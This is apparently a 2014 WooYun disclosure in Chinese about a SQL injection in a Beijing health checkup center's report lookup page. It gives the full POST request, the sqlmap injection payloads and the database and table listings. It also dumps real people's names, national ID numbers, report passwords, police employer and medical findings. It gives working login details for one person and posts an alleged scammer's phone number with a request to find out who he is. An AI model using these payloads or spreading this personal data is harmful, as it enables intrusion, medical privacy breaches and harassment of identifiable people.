当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083780

漏洞标题:某市体检中心漏洞泄露体检报告(包括个人详细资料、身体状况等)系列三

相关厂商:cncert国家互联网应急中心

漏洞作者: 小饼仔

提交时间:2014-11-19 12:31

修复时间:2015-01-03 12:32

公开时间:2015-01-03 12:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-24: 厂商已经确认,细节仅向厂商公开
2014-12-04: 细节向核心白帽子及相关领域专家公开
2014-12-14: 细节向普通白帽子公开
2014-12-24: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

第三发来了,近50W用户的姓名,身份证号,电话,住址,公司,个人身体状况全部都有~~还有公安局的,玩了,要被跨省了!
PS. 一个妹子朋友被骗了,求人肉骗子 骗子信息 电话号码:13918792971(上海) QQ: 94478959 姓名:王小新,自称在南京读过大学,貌似是南工大01届国贸,此人租房不给退押金,人跑了,打电话不接,妹子很伤心,有消息的请私信联系,感谢各位大神帮忙,妹子爆照!

详细说明:

北京市体检中心
地址:http://www.bjtjzx.com/bgcx/
(审核注意下,360那边有个北京市体检网http://www.bjtjw.net/bjtjw/index.html,和北京市体检中心不是一个网站,找到这个洞很久了,一直没提交,还是赶快提交了,省的重复了)

111.jpg


查询处存在POST注入

POST /bgcx/chaxun.asp HTTP/1.1
Host: www.bjtjzx.com
Proxy-Connection: keep-alive
Content-Length: 75
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.bjtjzx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.bjtjzx.com/bgcx/default.asp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: ASPSESSIONIDCCBRSRTT=NPHFJCCBPMIFELCKAHHGDNCB; CNZZDATA1719998=cnzz_eid%3D340004604-1414754488-http%253A%252F%252Fwww.bjtjzx.com%252F%26ntime%3D1414754488; chwlaz=1414755156184; chweblog_event=1414755156199; chweblog_dir=1414755156227; ASPSESSIONIDACARQSTS=EPIHFGIDHIDEENODGBKCMMIM
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
xingming=aaa&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF


sqlmap

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: xingming
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xingming=aaa' AND 9060=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9060=9060) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(101)+CHAR(115)+CHAR(111)+CHAR(113))) AND 'KOot'='KOot&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: xingming=aaa'; WAITFOR DELAY '0:0:5'--&kahao=111&password=11&csrq1=1970&csrq2=1&Submit2=%B2%E9%D1%AF
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database: 'tijiandangan'
current user is DBA: False
available databases [10]:
[*] Jsytjzx
[*] master
[*] model
[*] msdb
[*] newsletter
[*] Northwind
[*] pubs
[*] tempdb
[*] tiji
[*] tijian
Database: tijiandangan
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.TT_GR_Report | 472029 |
| dbo.gr_report | 460671 |
| dbo.cardpwd | 422498 |
| dbo.V_Net_Report_2006 | 125743 |
| dbo.V_Net_Report_2007 | 122527 |
| dbo.V_Net_Report_2008 | 117496 |
| dbo.V_Net_Report_2005 | 113860 |
| dbo.V_Net_Report_ZZ_2008 | 106342 |
| dbo.V_Net_Report_ZZ_2009 | 102861 |
| dbo.V_Net_Report_ZZ_2010 | 100690 |
| dbo.V_Net_Report_2009 | 99613 |
| dbo.V_Net_Report_ZZ_2011 | 96611 |
| dbo.V_Net_Report_ZZ_2012 | 94951 |
| dbo.V_Net_Report_ZZ_2013 | 91334 |
| dbo.V_Net_Report_ZZ_2014 | 87563 |
| dbo.V_Net_Report_2010 | 79578 |
| dbo.V_Net_Report_2012 | 72775 |
| dbo.V_Net_Report_2013 | 71778 |
| dbo.V_Net_Report_2014 | 69606 |
| dbo.chaxun_2011 | 16725 |
| dbo.chaxun_09 | 15387 |
| dbo.chaxun_2014 | 13859 |
| dbo.chaxun_2013 | 13127 |
| dbo.chaxun_2012 | 12622 |
| dbo.chaxun_10 | 12155 |
| dbo.ZZ_chaxun_13 | 2623 |
| dbo.ZZ_chaxun_09 | 1873 |
| dbo.ZZ_chaxun_08 | 1545 |
| dbo.ZZ_chaxun_11 | 1383 |
| dbo.ZZ_chaxun_10 | 1289 |
| dbo.ZZ_chaxun_14 | 1196 |
| dbo.V_Net_Report_2012_bj | 388 |
| dbo.V_Net_Report_2011 | 332 |
| dbo.sysconstraints | 32 |
| dbo.tongji_09 | 19 |
| dbo.tongji_10 | 19 |
| dbo.tongji_2011 | 19 |
| dbo.tongji_2013 | 19 |
| dbo.tongji_2014 | 19 |
| dbo.ZZ_tongji_08 | 19 |
| dbo.ZZ_tongji_09 | 19 |
| dbo.ZZ_tongji_10 | 19 |
| dbo.ZZ_tongji_12 | 19 |
| dbo.ZZ_tongji_13 | 19 |
| dbo.ZZ_tongji_14 | 19 |
| dbo.syssegments | 3 |
+--------------------------+---------+


看了下数据,gr_report是用户详细信息,有将近50W

Database: tijiandangan
Table: gr_report
[22 columns]
+----------+
| Column |
+----------+
| cardno |
| CKJB |
| CSRQ |
| DWMC |
| Flag |
| GRDJID |
| HYJL |
| JLYS |
| KH |
| KSJL |
| NL |
| old |
| password |
| position |
| RepDate |
| SFZHM |
| TJLX |
| TJSJ |
| XB |
| XM |
| ZJJL |
| ZJYS |
+----------+
泄露的信息有姓名、性别、卡号、体检小结、体检报告查询密码、身份证号码、公司等等
以下部分,麻烦审核帮忙打下码
举例
GRDJID NL XM XB KH old HYJL TJLX KSJL JLYS ZJYS Flag CSRQ DWMC ZJJL TJSJ CKJB SFZHM cardno RepDate password position
ZZ2014070300664001 35 姜南 女 8066080 0 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan 健康体检 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan= 薛慧峰 项北生 1 09 11 1979 12:00AM 北京市公安局(督察总队)--民警 2014 一、右下5易位(口腔科)<BR> 建议:<BR> 拔除。<BR>二、乳腺增生:双侧乳腺腺体结构局限性紊乱,回 07 15 2014 12:00AM B 级 210202197909111000 8066080 07 22 2014 11:45AM 619045 1
ZZ2014070300665001 36 雷挺 男 11092319 0 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan 健康体检 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan= 章平 项北生 1 01 8 1978 12:00AM 北京市公安局(督察总队)--民警 2014 一、超重 腰臀比异常 (一般检查)<BR> 建议:<BR> 1、调整饮食结构,限制每日总 07 15 2014 12:00AM B 级 610113197801080000 11092319 07 16 2014 9:33AM 942306 1
ZZ2014070300666001 33 吴熙 男 11092264 0 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan 健康体检 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan= 章平 项北生 1 11 15 1981 12:00AM 北京市公安局(督察总队)--民警 2014 一、超重 腰臀比异常 (一般检查)<BR> 建议:<BR> 1、调整饮食结构,限制每日总 07 15 2014 12:00AM B 级 110221198111158000 11092264 07 15 2014 4:26PM 869134 1
ZZ2014070300667001 36 田文杰 男 1029639 0 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan 健康体检 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan= 章平 项北生 1 04 19 1978 12:00AM 北京市公安局(督察总队)--民警 2014 体检缺项<BR><BR>本次体检所查项目未见明显异常 07 16 2014 12:00AM B 级 110229197804190000 1029639 07 17 2014 2:10PM 658814 1
ZZ2014070300668001 40 董国源 男 11092353 0 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=hy_table><tr><Td colspan 健康体检 <Table cellSpacing=1 cellPadding=8 width=760 border=0 align=center class=ksjc_table><tr><Td colspan= 章平 项北生 1 08 3 1974 12:00AM 北京市公安局(督察总队)--民警 2014 一、超重 (一般检查)<BR> 建议:<BR> 1、调整饮食结构,限制每日总热量。<BR>&nbs 07 17 2014 12:00AM B 级 110105197408037000 11092353 07 18 2014 7:32AM 398951 1


里面的XM,KH,PASSWORD,CSRQ
对应查询页面的姓名、卡号、密码、出生日期
我们选取一个
白雪,13074869,993661,1980 10

222.jpg


报告可在线查看、下载

333.jpg


还有其他一些表,比如

Database: tijiandangan
Table: cardpwd
[4 columns]
+----------+
| Column |
+----------+
| cardno |
| old |
| password |
| position |
+----------+


是一些卡号密码
剩下的没具体研究

漏洞证明:

修复方案:

求别跨省!

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-24 09:51

厂商回复:

最新状态:

暂无